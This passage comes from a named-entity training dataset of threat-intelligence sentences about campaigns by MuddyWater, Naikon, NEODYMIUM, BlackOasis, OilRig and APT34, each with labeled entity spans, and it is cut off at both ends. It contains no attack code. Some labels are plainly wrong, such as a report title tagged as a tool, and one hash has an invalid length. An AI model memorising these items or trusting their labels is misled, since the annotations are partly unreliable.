Trend Micro": [[14, 25]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[59, 78]]}, "info": {"id": "dnrti_train_001034", "source": "dnrti_train"}} {"text": "We recently noticed the group behind MuddyWater that appear to be targeting government bodies , military entities , telcos and educational institutions in Jordan , Turkey , Azerbaijan and Pakistan , in addition to the continuous targeting of Iraq and Saudi Arabia , other victims were also detected in Mali , Austria , Russia , Iran and Bahrain. .", "spans": {"THREAT_ACTOR: group": [[24, 29]], "THREAT_ACTOR: MuddyWater": [[37, 47]], "ORGANIZATION: government bodies": [[76, 93]], "ORGANIZATION: military entities": [[96, 113]], "ORGANIZATION: educational institutions": [[127, 151]]}, "info": {"id": "dnrti_train_001037", "source": "dnrti_train"}} {"text": "Observed Seedworm victims were located primarily in Pakistan and Turkey , but also in Russia , Saudi Arabia , Afghanistan , Jordan , and elsewhere .", "spans": {"THREAT_ACTOR: Seedworm": [[9, 17]]}, "info": {"id": "dnrti_train_001038", "source": "dnrti_train"}} {"text": "The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering , in addition to the active development of attacks , infrastructure and the use of new methods and techniques .", "spans": {"THREAT_ACTOR: MuddyWaters group": [[4, 21]]}, "info": {"id": "dnrti_train_001039", "source": "dnrti_train"}} {"text": "Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \" BlackWater \" is associated with suspected persistent threat actor MuddyWater .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]], "THREAT_ACTOR: threat actor MuddyWater": [[147, 170]]}, "info": {"id": "dnrti_train_001040", "source": "dnrti_train"}} {"text": "In this latest activity , BlackWater first added an obfuscated Visual Basic for Applications ( VBA ) script to establish persistence as a registry key .", "spans": {"TOOL: Visual Basic for Applications": [[63, 
92]], "TOOL: VBA": [[95, 98]]}, "info": {"id": "dnrti_train_001041", "source": "dnrti_train"}} {"text": "Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: threat actor MuddyWater": [[111, 134]]}, "info": {"id": "dnrti_train_001042", "source": "dnrti_train"}} {"text": "MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]]}, "info": {"id": "dnrti_train_001043", "source": "dnrti_train"}} {"text": "Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) .", "spans": {"TOOL: MuddyWater-associated samples": [[43, 72]], "TOOL: PowerShell commands": [[157, 176]], "THREAT_ACTOR: actor": [[248, 253]]}, "info": {"id": "dnrti_train_001044", "source": "dnrti_train"}} {"text": "Despite last month 's report on aspects of the MuddyWater campaign , the group is undeterred and continues to perform operations .", "spans": {"THREAT_ACTOR: group": [[73, 78]]}, "info": {"id": "dnrti_train_001045", "source": "dnrti_train"}} {"text": "Based on these observations , as well as MuddyWater 's history of targeting Turkey-based entities , we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group .", "spans": {"THREAT_ACTOR: MuddyWater": [[41, 51], [177, 187]], "THREAT_ACTOR: threat actor group": [[188, 206]]}, "info": {"id": "dnrti_train_001046", "source": "dnrti_train"}} {"text": "Our recent report , \" The Chronicles of the Hellsing APT : the Empire Strikes Back \" began with an introduction to the Naikon APT , describing it as \" One of the most active APTs 
in Asia , especially around the South China Sea \" .", "spans": {"THREAT_ACTOR: Hellsing APT": [[44, 56]], "TOOL: Empire Strikes Back": [[63, 82]], "THREAT_ACTOR: Naikon APT": [[119, 129]]}, "info": {"id": "dnrti_train_001047", "source": "dnrti_train"}} {"text": "It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 .", "spans": {"TOOL: Tran Duy Linh": [[27, 40]], "VULNERABILITY: CVE-2012-0158": [[43, 56]]}, "info": {"id": "dnrti_train_001048", "source": "dnrti_train"}} {"text": "Considering the volume of Naikon activity observed and its relentless , repeated attack attempts , such a confrontation was worth looking into , so we did .", "spans": {}, "info": {"id": "dnrti_train_001049", "source": "dnrti_train"}} {"text": "The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal , Thailand , Laos and China .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "ORGANIZATION: government agencies": [[76, 95]], "ORGANIZATION: civil and military organizations": [[100, 132]]}, "info": {"id": "dnrti_train_001050", "source": "dnrti_train"}} {"text": "This Naikon report will be complemented by a follow-on report that will examine the Naikon TTP and the incredible volume of attack activity around the South China Sea that has been going on since at least 2010 .", "spans": {"THREAT_ACTOR: Naikon": [[5, 11], [84, 90]]}, "info": {"id": "dnrti_train_001052", "source": "dnrti_train"}} {"text": "The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "ORGANIZATION: 
government agencies": [[76, 95]], "ORGANIZATION: civil and military organizations": [[100, 132]]}, "info": {"id": "dnrti_train_001053", "source": "dnrti_train"}} {"text": "In the Naikon scheme , a C&C server can be specialized XSControl software running on the host machine .", "spans": {"THREAT_ACTOR: Naikon": [[7, 13]], "TOOL: C&C server": [[25, 35]]}, "info": {"id": "dnrti_train_001055", "source": "dnrti_train"}} {"text": "It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data exfiltration from high-profile victim organizations .", "spans": {"THREAT_ACTOR: attackers": [[56, 65]], "TOOL: Naikon proxies": [[73, 87]]}, "info": {"id": "dnrti_train_001056", "source": "dnrti_train"}} {"text": "In addition to stealing keystrokes , Naikon also intercepted network traffic .", "spans": {"THREAT_ACTOR: Naikon": [[37, 43]]}, "info": {"id": "dnrti_train_001057", "source": "dnrti_train"}} {"text": "Operator X also took advantage of cultural idiosyncrasies in its target countries , for example , the regular and widely accepted use of personal Gmail accounts for work .", "spans": {}, "info": {"id": "dnrti_train_001058", "source": "dnrti_train"}} {"text": "In the spring of 2014 , we noticed an increase in the volume of attack activity by the Naikon APT .", "spans": {"THREAT_ACTOR: Naikon APT": [[87, 97]]}, "info": {"id": "dnrti_train_001059", "source": "dnrti_train"}} {"text": "In particular , we noticed that the Naikon group was spear-phished by an actor we now call \" Hellsing \" .", "spans": {"THREAT_ACTOR: Naikon group": [[36, 48]], "THREAT_ACTOR: actor": [[73, 78]], "THREAT_ACTOR: Hellsing": [[93, 101]]}, "info": {"id": "dnrti_train_001060", "source": "dnrti_train"}} {"text": "More details about the cloak and dagger games between Naikon and Hellsing can be found in our blogpost : \" The Chronicles of the Hellsing APT : The Empire Strikes Back \" .", 
"spans": {"THREAT_ACTOR: Naikon": [[54, 60]], "THREAT_ACTOR: Hellsing": [[65, 73]], "THREAT_ACTOR: Hellsing APT": [[129, 141]], "TOOL: Empire Strikes Back": [[148, 167]]}, "info": {"id": "dnrti_train_001061", "source": "dnrti_train"}} {"text": "Truvasys has been involved in several attack campaigns , where it has masqueraded as one of server common computer utilities , including WinUtils , TrueCrypt , WinRAR , or SanDisk .", "spans": {"TOOL: Truvasys": [[0, 8]], "ORGANIZATION: computer utilities": [[106, 124]], "ORGANIZATION: WinUtils": [[137, 145]], "ORGANIZATION: TrueCrypt": [[148, 157]], "ORGANIZATION: WinRAR": [[160, 166]], "ORGANIZATION: SanDisk": [[172, 179]]}, "info": {"id": "dnrti_train_001062", "source": "dnrti_train"}} {"text": "The group primarily uses Truvasys , a first-stage malware that has been in circulation for several years .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: Truvasys": [[25, 33]]}, "info": {"id": "dnrti_train_001064", "source": "dnrti_train"}} {"text": "PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: NEODYMIUM": [[15, 24]], "VULNERABILITY: CVE-2016-4117": [[50, 63]]}, "info": {"id": "dnrti_train_001066", "source": "dnrti_train"}} {"text": "Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks .", "spans": {}, "info": {"id": "dnrti_train_001067", "source": "dnrti_train"}} {"text": "In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[25, 35]], "THREAT_ACTOR: NEODYMIUM": [[40, 49]], "ORGANIZATION: specific individuals": [[94, 114]]}, "info": {"id": "dnrti_train_001068", "source": "dnrti_train"}} {"text": "Meanwhile , NEODYMIUM used well-tailored spear-phishing emails with attachments 
that delivered the exploit code , ultimately leading to Wingbird 's installation on victim computers .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[12, 21]], "TOOL: Wingbird": [[136, 144]]}, "info": {"id": "dnrti_train_001069", "source": "dnrti_train"}} {"text": "PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: NEODYMIUM": [[15, 24]], "VULNERABILITY: zero-day exploit": [[37, 53]]}, "info": {"id": "dnrti_train_001070", "source": "dnrti_train"}} {"text": "Wingbird , the advanced malware used by NEODYMIUM , has several behaviors that trigger alerts in Windows Defender ATP .", "spans": {"TOOL: Wingbird": [[0, 8]], "THREAT_ACTOR: NEODYMIUM": [[40, 49]], "ORGANIZATION: Windows Defender ATP": [[97, 117]]}, "info": {"id": "dnrti_train_001071", "source": "dnrti_train"}} {"text": "This volume chronicles two activity groups , code-named PROMETHIUM and NEODYMIUM , both of which target individuals in a specific area of Europe .", "spans": {"THREAT_ACTOR: activity groups": [[27, 42]], "THREAT_ACTOR: PROMETHIUM": [[56, 66]], "THREAT_ACTOR: NEODYMIUM": [[71, 80]]}, "info": {"id": "dnrti_train_001072", "source": "dnrti_train"}} {"text": "Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": {"THREAT_ACTOR: espionage": [[67, 76]], "THREAT_ACTOR: activity groups": [[116, 131]], "ORGANIZATION: specific individuals": [[165, 185]]}, "info": {"id": "dnrti_train_001073", "source": "dnrti_train"}} {"text": "In May 2016 , both PROMETHIUM and NEODYMIUM were observed to launch attack campaigns .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[19, 29]], "THREAT_ACTOR: NEODYMIUM": [[34, 43]]}, "info": {"id": "dnrti_train_001074", "source": "dnrti_train"}} {"text": "NEODYMIUM is an activity group that , like PROMETHIUM , conducted an attack 
campaign in early May 2016 .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[0, 9]], "THREAT_ACTOR: activity group": [[16, 30]], "THREAT_ACTOR: PROMETHIUM": [[43, 53]]}, "info": {"id": "dnrti_train_001075", "source": "dnrti_train"}} {"text": "Data about Wingbird activity indicates that it is typically used to attack individuals and individual computers instead of networks .", "spans": {}, "info": {"id": "dnrti_train_001076", "source": "dnrti_train"}} {"text": "NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[0, 9]], "VULNERABILITY: CVE-2016-4117": [[35, 48]], "THREAT_ACTOR: PROMETHIUM": [[67, 77]]}, "info": {"id": "dnrti_train_001077", "source": "dnrti_train"}} {"text": "NEODYMIUM used a backdoor detected by Windows Defender as Wingbird , whose characteristics closely match FinFisher , a government-grade commercial surveillance package .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[0, 9]], "TOOL: Wingbird": [[58, 66]], "ORGANIZATION: FinFisher": [[105, 114]]}, "info": {"id": "dnrti_train_001078", "source": "dnrti_train"}} {"text": "In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown .", "spans": {"THREAT_ACTOR: activity groups": [[39, 54]], "THREAT_ACTOR: PROMETHIUM": [[57, 67]], "THREAT_ACTOR: NEODYMIUM": [[72, 81]], "VULNERABILITY: zeroday exploit": [[140, 155]]}, "info": {"id": "dnrti_train_001079", "source": "dnrti_train"}} {"text": "The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"THREAT_ACTOR: hacker group": [[19, 31]], "THREAT_ACTOR: 
BlackOasis": [[60, 70]], "ORGANIZATION: Kaspersky": [[73, 82]], "THREAT_ACTOR: group": [[93, 98]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[116, 157]], "VULNERABILITY: CVE-2016-4117": [[160, 173]], "TOOL: FinSpy": [[220, 226]]}, "info": {"id": "dnrti_train_001080", "source": "dnrti_train"}} {"text": "FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group — which goes by other names , including FinFisher and Lench IT Solutions .", "spans": {"TOOL: FinSpy": [[0, 6]], "THREAT_ACTOR: attacker": [[50, 58]], "THREAT_ACTOR: Gamma Group": [[165, 176]], "ORGANIZATION: FinFisher": [[217, 226]]}, "info": {"id": "dnrti_train_001081", "source": "dnrti_train"}} {"text": "In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China .", "spans": {"THREAT_ACTOR: BlackOasis": [[14, 24]]}, "info": {"id": "dnrti_train_001082", "source": "dnrti_train"}} {"text": "BlackOasis in recent months sent a wave of phishing emails .", "spans": {"THREAT_ACTOR: BlackOasis": [[0, 10]]}, "info": {"id": "dnrti_train_001083", "source": "dnrti_train"}} {"text": "PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data exfiltration .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]]}, "info": {"id": "dnrti_train_001084", "source": "dnrti_train"}} {"text": "Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]], "THREAT_ACTOR: Neodymium": [[44, 53]], "THREAT_ACTOR: activity groups": [[93, 108]], "THREAT_ACTOR: PROMETHIUM": [[188, 198]], "THREAT_ACTOR: 
NEODYMIUM": [[203, 212]]}, "info": {"id": "dnrti_train_001085", "source": "dnrti_train"}} {"text": "The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 .", "spans": {"ORGANIZATION: Kaspersky": [[17, 26]], "VULNERABILITY: zero-day exploit": [[52, 68]], "THREAT_ACTOR: BlackOasis": [[77, 87]]}, "info": {"id": "dnrti_train_001086", "source": "dnrti_train"}} {"text": "Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola .", "spans": {"THREAT_ACTOR: BlackOasis": [[11, 21]]}, "info": {"id": "dnrti_train_001087", "source": "dnrti_train"}} {"text": "Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": {"THREAT_ACTOR: activity groups": [[12, 27]], "THREAT_ACTOR: PROMETHIUM": [[107, 117]], "THREAT_ACTOR: NEODYMIUM": [[122, 131]]}, "info": {"id": "dnrti_train_001088", "source": "dnrti_train"}} {"text": "A cursory review of BlackOasis ' espionage campaign suggests there is some overlap between the group 's actions and Saudi Arabia 's geopolitical interests .", "spans": {"THREAT_ACTOR: BlackOasis": [[20, 30]], "THREAT_ACTOR: group": [[95, 100]]}, "info": {"id": "dnrti_train_001089", "source": "dnrti_train"}} {"text": "Kaspersky 's research notes that BlackOasis hacked into computers based in Saudi Arabia .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackOasis": [[33, 43]]}, "info": {"id": "dnrti_train_001090", "source": "dnrti_train"}} {"text": "All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ways : economically ; from a national security perspective ; or due to established 
policy agreements .", "spans": {"ORGANIZATION: Kaspersky": [[23, 32]]}, "info": {"id": "dnrti_train_001091", "source": "dnrti_train"}} {"text": "The Operation Aurora , named by McAfee and announced in January 2010 , and the WikiLeaks document disclosures of 2010 have highlighted the fact that external and internal threats are nearly impossible to prevent .", "spans": {"ORGANIZATION: McAfee": [[32, 38]], "ORGANIZATION: WikiLeaks": [[79, 88]]}, "info": {"id": "dnrti_train_001092", "source": "dnrti_train"}} {"text": "We have identified the tools , techniques , and network activities used in these continuing attacks—which we have dubbed Night Dragon—as originating primarily in China .", "spans": {"THREAT_ACTOR: Night Dragon—as": [[121, 136]]}, "info": {"id": "dnrti_train_001095", "source": "dnrti_train"}} {"text": "Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "ORGANIZATION: petrochemical companies": [[210, 233]], "ORGANIZATION: executives": [[263, 273]]}, "info": {"id": "dnrti_train_001096", "source": "dnrti_train"}} {"text": "The primary operational technique used by Night Dragon comprised a variety of hacker tools , including privately developed and customized RAT tools that provided complete remote administration capabilities to the attacker .", "spans": {"THREAT_ACTOR: Night Dragon": [[42, 54]], "TOOL: RAT tools": [[138, 147]], "THREAT_ACTOR: attacker": [[213, 221]]}, "info": {"id": "dnrti_train_001098", "source": "dnrti_train"}} {"text": "While Night Dragon attacks focused specifically on the energy sector , the tools and techniques of this kind can be highly successful when 
targeting any industry .", "spans": {"ORGANIZATION: energy sector": [[55, 68]]}, "info": {"id": "dnrti_train_001099", "source": "dnrti_train"}} {"text": "In addition , the attackers employed hacking tools of Chinese origin and that are prevalent on Chinese underground hacking forums .", "spans": {"THREAT_ACTOR: attackers": [[18, 27]]}, "info": {"id": "dnrti_train_001100", "source": "dnrti_train"}} {"text": "We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign , a campaign Unit 42 has been following since May 2016 .", "spans": {"THREAT_ACTOR: actors": [[91, 97]], "ORGANIZATION: Unit 42": [[154, 161]]}, "info": {"id": "dnrti_train_001101", "source": "dnrti_train"}} {"text": "Recently we were able to observe these actors making modifications to their Clayslide delivery documents in an attempt to evade antivirus detection .", "spans": {"THREAT_ACTOR: actors": [[39, 45]], "TOOL: Clayslide delivery documents": [[76, 104]]}, "info": {"id": "dnrti_train_001102", "source": "dnrti_train"}} {"text": "We collected two sets of Clayslide samples that appear to be created during the OilRig actor 's development phase of their attack lifecycle .", "spans": {"TOOL: Clayslide samples": [[25, 42]], "THREAT_ACTOR: OilRig actor": [[80, 92]]}, "info": {"id": "dnrti_train_001103", "source": "dnrti_train"}} {"text": "On November 15 , 2016 , an actor related to the OilRig campaign began testing the Clayslide delivery documents .", "spans": {"THREAT_ACTOR: actor": [[27, 32]], "TOOL: Clayslide delivery documents": [[82, 110]]}, "info": {"id": "dnrti_train_001104", "source": "dnrti_train"}} {"text": "The actor then made subtle modifications to the file and uploaded the newly created file to the same popular antivirus testing website in order to determine how to evade detection .", "spans": {"THREAT_ACTOR: actor": [[4, 9]]}, "info": {"id": "dnrti_train_001105", "source": "dnrti_train"}} {"text": "In addition 
to making changes to the Excel worksheets that contain the decoy content , the actor also made changes to the worksheet that is initially displayed to the user .", "spans": {"THREAT_ACTOR: actor": [[91, 96]]}, "info": {"id": "dnrti_train_001106", "source": "dnrti_train"}} {"text": "Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system .", "spans": {"THREAT_ACTOR: OilRig": [[65, 71]], "MALWARE: Clayslide delivery documents": [[79, 107]]}, "info": {"id": "dnrti_train_001107", "source": "dnrti_train"}} {"text": "This realization suggests that the OilRig threat group will continue to use their delivery documents for extended periods with subtle modifications to remain effective .", "spans": {"THREAT_ACTOR: OilRig": [[35, 41]], "THREAT_ACTOR: threat group": [[42, 54]], "TOOL: delivery documents": [[82, 100]]}, "info": {"id": "dnrti_train_001108", "source": "dnrti_train"}} {"text": "Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015 .", "spans": {"THREAT_ACTOR: OilRig": [[21, 27]]}, "info": {"id": "dnrti_train_001109", "source": "dnrti_train"}} {"text": "In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors , several financial institutes , and the Israeli Post Office .", "spans": {"TOOL: VPN Web Portal": [[37, 51]], "ORGANIZATION: IT vendors": [[87, 97]], "ORGANIZATION: financial institutes": [[108, 128]], "ORGANIZATION: Israeli Post Office": [[139, 158]]}, "info": {"id": "dnrti_train_001110", "source": "dnrti_train"}} {"text": "In these websites they hosted malware that was digitally signed with a valid , likely stolen code signing certificate .", "spans": 
{"TOOL: stolen code signing certificate": [[86, 117]]}, "info": {"id": "dnrti_train_001111", "source": "dnrti_train"}} {"text": "In December 2015 , Symantec published a post about \" two Iran-based attack groups that appear to be connected , Cadelle and Chafer \" that \" have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations \" .", "spans": {"ORGANIZATION: Symantec": [[19, 27]], "THREAT_ACTOR: attack groups": [[68, 81]], "THREAT_ACTOR: Cadelle": [[112, 119]], "THREAT_ACTOR: Chafer": [[124, 130]], "TOOL: Backdoor.Cadelspy": [[156, 173]], "TOOL: Backdoor.Remexi": [[178, 193]]}, "info": {"id": "dnrti_train_001112", "source": "dnrti_train"}} {"text": "In May 2016 , Unit 42 observed attacks of OilRig primarily focused on financial institutions and technology organizations within Saudi Arabia .", "spans": {"ORGANIZATION: Unit 42": [[14, 21]], "THREAT_ACTOR: OilRig": [[42, 48]], "ORGANIZATION: financial institutions": [[70, 92]], "ORGANIZATION: technology organizations": [[97, 121]]}, "info": {"id": "dnrti_train_001113", "source": "dnrti_train"}} {"text": "In recent OilRig attacks , the threat actors purport to be legitimate service providers offering service and technical troubleshooting as a social engineering theme in their spear-phishing attacks .", "spans": {"THREAT_ACTOR: threat actors": [[31, 44]], "ORGANIZATION: legitimate service providers": [[59, 87]]}, "info": {"id": "dnrti_train_001114", "source": "dnrti_train"}} {"text": "The campaign appears highly targeted and delivers a backdoor we have called ' Helminth ' .", "spans": {"TOOL: Helminth": [[78, 86]]}, "info": {"id": "dnrti_train_001115", "source": "dnrti_train"}} {"text": "Artifacts identified within the malware samples related to these attacks also suggest the targeting of the defense industry in Saudi Arabia , which appears to be related to an earlier wave of attacks carried out in the fall of 2015 .", "spans": {}, "info": {"id": 
"dnrti_train_001116", "source": "dnrti_train"}} {"text": "In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia .", "spans": {"ORGANIZATION: Unit 42": [[14, 21]], "ORGANIZATION: financial organizations": [[149, 172]]}, "info": {"id": "dnrti_train_001117", "source": "dnrti_train"}} {"text": "Over the course of the attack campaign , we have observed two different variations of the Helminth backdoor , one written in VBScript and PowerShell that was delivered via a macro within Excel spreadsheets and the other a standalone Windows executable .", "spans": {"TOOL: Helminth backdoor": [[90, 107]]}, "info": {"id": "dnrti_train_001118", "source": "dnrti_train"}} {"text": "FireEye also reported on these attacks in a May 22 blog post .", "spans": {"ORGANIZATION: FireEye": [[0, 7]]}, "info": {"id": "dnrti_train_001119", "source": "dnrti_train"}} {"text": "The executable variant of Helminth is installed with a dropper Trojan that we are tracking as the HerHer Trojan .", "spans": {"TOOL: Helminth": [[26, 34]], "TOOL: dropper Trojan": [[55, 69]], "TOOL: HerHer Trojan": [[98, 111]]}, "info": {"id": "dnrti_train_001120", "source": "dnrti_train"}} {"text": "The Helminth executable variant is very similar in functionality to its script-based counterpart , as it also communicates with its C2 server using both HTTP and DNS queries .", "spans": {"TOOL: Helminth": [[4, 12]], "TOOL: HTTP": [[153, 157]], "TOOL: DNS": [[162, 165]]}, "info": {"id": "dnrti_train_001121", "source": "dnrti_train"}} {"text": "Helminth executable samples send artifacts within network beacons to its C2 server that the Trojan refers to as a ' Group ' and ' Name ' .", "spans": {"TOOL: Helminth": [[0, 8]]}, "info": {"id": "dnrti_train_001122", "source": "dnrti_train"}} {"text": "This suggests that the threat actors are not only focused on financial organizations , as their target 
set could include other industries as well .", "spans": {"THREAT_ACTOR: threat actors": [[23, 36]], "ORGANIZATION: financial organizations": [[61, 84]]}, "info": {"id": "dnrti_train_001125", "source": "dnrti_train"}} {"text": "The email address edmundj@chmail.ir and the geolocation of Tehran , Iran , being of note .", "spans": {}, "info": {"id": "dnrti_train_001126", "source": "dnrti_train"}} {"text": "The registrant information for kernel.ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle.org was the same used for mydomain1607.com , chmail.ir .", "spans": {"ORGANIZATION: email provider": [[92, 106]]}, "info": {"id": "dnrti_train_001127", "source": "dnrti_train"}} {"text": "The mydomain1110.com domain did not appear to reuse any of the previously observed WHOIS data artifacts , but did still give a geolocation of Tehran in addition to the use of an email address linked to other domains thematically similar to the know command and control domains and are potentially related .", "spans": {}, "info": {"id": "dnrti_train_001128", "source": "dnrti_train"}} {"text": "While researching the OilRig campaign , we have seen two waves of targeted attacks on Saudi Arabian organizations in which a group of threat actors delivered the Helminth Trojan as a payload .", "spans": {"THREAT_ACTOR: group": [[125, 130]], "THREAT_ACTOR: threat actors": [[134, 147]]}, "info": {"id": "dnrti_train_001129", "source": "dnrti_train"}} {"text": "The two variants of Helminth do require different delivery methods , with the script variant relying on an Excel spreadsheet for delivery , while the executable variant is more traditional in the fact that it can be installed without a delivery document .", "spans": {"TOOL: Helminth": [[20, 28]]}, "info": {"id": "dnrti_train_001130", "source": "dnrti_train"}} {"text": "Since our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new activity .", 
"spans": {"THREAT_ACTOR: group": [[106, 111]]}, "info": {"id": "dnrti_train_001131", "source": "dnrti_train"}} {"text": "Additionally , the scope of organizations targeted by this group has expanded to not only include organizations within Saudi Arabia , but also a company in Qatar and government organizations in Turkey , Israel and the United States .", "spans": {"THREAT_ACTOR: group": [[59, 64]], "ORGANIZATION: government organizations": [[166, 190]]}, "info": {"id": "dnrti_train_001132", "source": "dnrti_train"}} {"text": "The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_001133", "source": "dnrti_train"}} {"text": "In addition to these instances , multiple Qatari organizations were the subject to spear phishing attacks carrying Helminth samples earlier this year .", "spans": {"ORGANIZATION: Qatari organizations": [[42, 62]], "TOOL: Helminth samples": [[115, 131]]}, "info": {"id": "dnrti_train_001134", "source": "dnrti_train"}} {"text": "While the malware deployed is not terribly sophisticated , it uses techniques such as DNS command and control ( C2 ) that allows it to stay under the radar at many establishments .", "spans": {}, "info": {"id": "dnrti_train_001135", "source": "dnrti_train"}} {"text": "Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 
14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": {"ORGANIZATION: Microsoft": [[23, 32]], "VULNERABILITY: CVE-2017-11882": [[52, 66]], "ORGANIZATION: FireEye": [[87, 94]], "THREAT_ACTOR: attacker": [[107, 115]], "VULNERABILITY: Microsoft Office vulnerability": [[141, 171]], "ORGANIZATION: government organization": [[184, 207]]}, "info": {"id": "dnrti_train_001136", "source": "dnrti_train"}} {"text": "We assess this activity was carried out by a suspected Iranian cyber espionage threat group , whom we refer to as APT34 , using a custom PowerShell backdoor to achieve its objectives .", "spans": {"THREAT_ACTOR: cyber espionage threat group": [[63, 91]], "THREAT_ACTOR: APT34": [[114, 119]], "TOOL: custom PowerShell backdoor": [[130, 156]]}, "info": {"id": "dnrti_train_001137", "source": "dnrti_train"}} {"text": "We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": {"THREAT_ACTOR: APT34": [[15, 20]]}, "info": {"id": "dnrti_train_001139", "source": "dnrti_train"}} {"text": "APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts , sometimes coupled with social engineering tactics .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]], "TOOL: public and non-public tools": [[20, 47]], "TOOL: compromised accounts": [[99, 119]]}, "info": {"id": "dnrti_train_001140", "source": "dnrti_train"}} {"text": "We believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 .", "spans": {"THREAT_ACTOR: APT34": [[11, 16]]}, "info": {"id": "dnrti_train_001141", "source": "dnrti_train"}} {"text": "In May 2016 , we 
